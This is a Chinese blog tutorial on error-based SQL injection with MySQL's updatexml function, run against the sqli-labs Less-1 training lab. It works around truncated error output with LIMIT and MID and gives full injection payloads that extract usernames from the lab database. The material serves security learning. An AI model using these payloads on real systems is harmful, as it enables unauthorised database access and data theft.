sql手工注入时解决updatexml取值显示不全的问题

已于 2023-12-25 01:34:18 修改
阅读量560 收藏 1
点赞数 4
文章标签: 网络安全
于 2023-02-17 10:05:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53730939/article/details/129078760
版权
文章介绍了如何使用updatexml函数结合XPath在SQL注入场景中更新和提取数据,通过sqli-labs靶场的Less-1关卡示例,展示了limit和mid函数在分页读取超过一行数据时的应用,讨论了两种方法的效率差异。
摘要由CSDN通过智能技术生成

updatexml函数用法

updatexml(xml_doument,XPath_string,new_value)

第一个参数:XML的内容

第二个参数:是需要update的位置XPATH路径

第三个参数:是更新后的内容

所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式

 

实验环境

本次实验使用的是github上开源的sqli-labs训练靶场的第一关

 

解决方法

这里我们以/Less-1为例

http://192.168.8.158:90/Less-1/?id=1' and updatexml(1,concat(0x23,(select

group_concat(username) from security.users)),1) -- +

65ef16cb984e3b531ea345117ce8c39a.png

 

此时发现回显数据超过一行,无法显示

第一种方法:

这个时候limit函数的作用就出现了

limit函数

limit 0,1, 从表中的第0个数据开始,只读取一个

输入:?id=1' and updatexml(1,concat(0x23,(select username from users limit 0,1 )),0) -- +

bbf9ca979e495805a07073128f647c03.png

我们只需要变更limit后的第一个参数值就可以把数据一一显示出来

d5b45502868e48549bbefe3cd24f9ca6.png
420bd1f96db8831405acc3fc6b7a1cca.png

以此类推可以读取所有字段

 

第二种方法:

使用mid函数:

MID 函数用于从文本字段中提取字符。

mid()函数语法如下:

SELECT MID(column_name,start[,length]) FROM table_name

其中第一个参数是要提取的表名,第二个参数为起始位置,第三个参数为返回的字符个数(最多返回31个字符)

 

输入:

?id=1' and updatexml(1,concat(0x23,mid((select group_concat(username) from security.users),1,31)),1) -- +

ce3376529123016ed49126b3cd2f1fd8.png

我们只需要变更mid后的第二个参数值就可以把数据全部显示出来

输入:

?id=1' and updatexml(1,concat(0x23,mid((select group_concat(username) from security.users),32,31)),1) -- +

9e7a9c14c59f2585e8d075acbb6cf595.png

输入:

?id=1' and updatexml(1,concat(0x23,mid((select group_concat(username) from security.users),63,31)),1) -- +

6e246771d179189b0d5da23db224ecd1.png

相比之下我个人觉得mid方法相对于limit读取数据更快一些~

 

 

hh_y
关注
24-3 SQl 注入 - 利用报错函数updatexml及extracevalue
weixin_43263566的博客
02-11 1326
改变文档中符合条件的节点,使用不同的 XML 标记匹配和替换 XML 块的函数。:String 格式,为 XML 文档对象的名称。:XPath 格式的字符串,代表路径。new_value:String 格式,用于替换查找到的符合条件的数据。通过提供一个 XML 标记片段和 XPath 表达式,从 XML 文档中提取值的函数。xml_frag:XML 标记片段,即 XML 文档对象。xpath_expr:XPath 表达式,用于定位需要提取的值。
【JAVA高级】——吃透JDBC中的SQL注入问题解决方案
热门推荐
不迁怒,不贰过。小知识,大智慧。
10-26 1万+
吃透JDBC中的SQL注入问题解决方案
SQL注入不完全思路与防注入程序
weixin_30892987的博客
07-25 180
<一>SQL注入简介   许多网站程序在编写,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。   <二>SQL注入思路   思路最重要。其实好多人都不知道SQL到底能做什么呢?这里总结...
SQL报错注入updatexml
最新发布
2301_78549931的博客
08-05 1284
第一个参数:XML的内容第二个参数:是需要update的位置XPATH路径第三个参数:是更新后的内容所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。
关于SQL报错注入数据输出显示不完全的问题
m0_63138919的博客
07-27 1296
本文是对于sql报错注入 数据结果显示不全问题解决方案 欢迎大家进行补充
报错注入显示不全问题
矜庄寂寥的博客
12-18 4187
目录介绍实验环境解决方法0x010x02 方法一(利用limit子句)0x02 方法二(使用mid函数)0x03 方法三(sqlmap O(∩_∩)O) 介绍 在sql主任中使用 updatexml extractvalue exp floor函数进行报错注入,有会出现由于数据的数量过多导致无法一次性显示所有内容,所以鄙人就去寻找了几种解决方法 实验环境 本次实验使用的是github上开源的sqli-labs训练靶场 地址:https://github.com/Audi-1/sqli-labs 解决
iwebsec靶场SQL注入-updatexml注入
qq_56041380的博客
03-27 495
updatexml注入也是一种报错注入,它利用updatexml函数中的第二个参数Xpath_string的报错进行注入。Xpath_string是XML文档路径,格式是/XXX/XXX/XXX/,如果格式不正确就会报错。
sql手工注入实战
mulincong的博客
05-30 2326
sql手工注入封神台靶场
SQL注入——盲注和手工注入
bosskim的博客
06-13 1255
温故知新,学习sql注入分类
sql注入updatexml以及extractvalue函数报错注入及原理
maluxiao123的博客
03-29 1220
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入报错注入、bool盲注、延注入、堆叠注入、二次注入、宽字节注入、http头注、DNS LOAD注入 sql注入报错注入利用的是页面返回了数据库报错的内容,当回显注入无法使用使用报错注入,可用的报错函数有很多,我会介绍updatexml以及extarctvalue函数报错注入 输入单引号发现有sql报错,可以使用报错注入 payload: and(select updatexml(0
Right 注入语法-转mysql注入当字符太长显示不全的-安鸾靶场 宽字符注入02
zyf007love的博客
09-12 282
Right 注入语法
SQL注入----报错注入简介(updatexml
一只web狗
06-21 3567
报错注入updatexml)常用语句
SQL注入——UpdateXml报错注入
heyingcheng的博客
03-07 465
正常句式:select updatexml(doc,'/book/author/surname','1') from xml;错误句式:select updatexml(doc,'~book/author/surname','1') from xml;第一个参数:XML_document是string格式,为XML文档对象的名称,例如Doc。第三个参数:new_value,string格式,替换查找到的符合条件的数据。第二个参数:XPath_string是路径,XPath格式的字符串。
SQL报错注入攻击中的updatexml()函数
weixin_45738112的博客
03-27 1853
SQL报错注入攻击中的updatexml()函数 sql报错注入是程序将错误信息输出到页面上,如果get获取参数拼接到SQL语句中,执行成功,正常输出;如果出错,PHP代码里会执行一个echo mysqli_error(con)的语句(这里只是举个普遍例子)mysqlierror(con)的语句(这里只是举个普遍例子)mysqli_error(con)的语句(这里只是举个普遍例子)mysqlie​...
sqli-labs第五关sql注入流程(重点讲updatexml函数的特性)
m0_74798594的博客
05-09 554
注:limit 1,1中前面的1可以换0,2,3... 帐号和密码中间的0是为了将二者分别开,没有特殊含义。通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。所以这关应该是盲注。加上单引号后,发现会返回报错信息,且可以知道是单引号闭合的,可以考虑使用报错注入。使用报错的sql盲注有很多方法,本文使用updatexml函数的特性来进行报错注入。注:两个1都可以换成任意值不影响,这里主要是利用xpath的语法来爆相关数据。测试id=1,没有显示数据。
SQL注入之错误注入_基于updatexml()的脱库原理
wangyuxiang946的博客
06-21 1万+
updatexml()的基本用法、报错原理及脱库步骤
解决updatexml函数显示内容不全问题
网安小白的博客
02-17 302
解决updatexml函数显示内容不全的情况,结尾处~符号显示查询完毕。博主练习环境是sqli-labs靶场的第五关:查询users表中username的内容。
调用SQL Server存储过程返回的XML不完整的一中解决方法
MazenChan的博客
03-15 551
问题描述: 开发调用一存储过程的方法,方法的出参为XML // 执行存储过程 SP_SST_THIRD_INTERFACE String callString="{call SP_SST_THIRD_INTERFACE(?,?,?)}"; String outXml = this.getJdbcTemplate().execute(callString, new CallableState...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值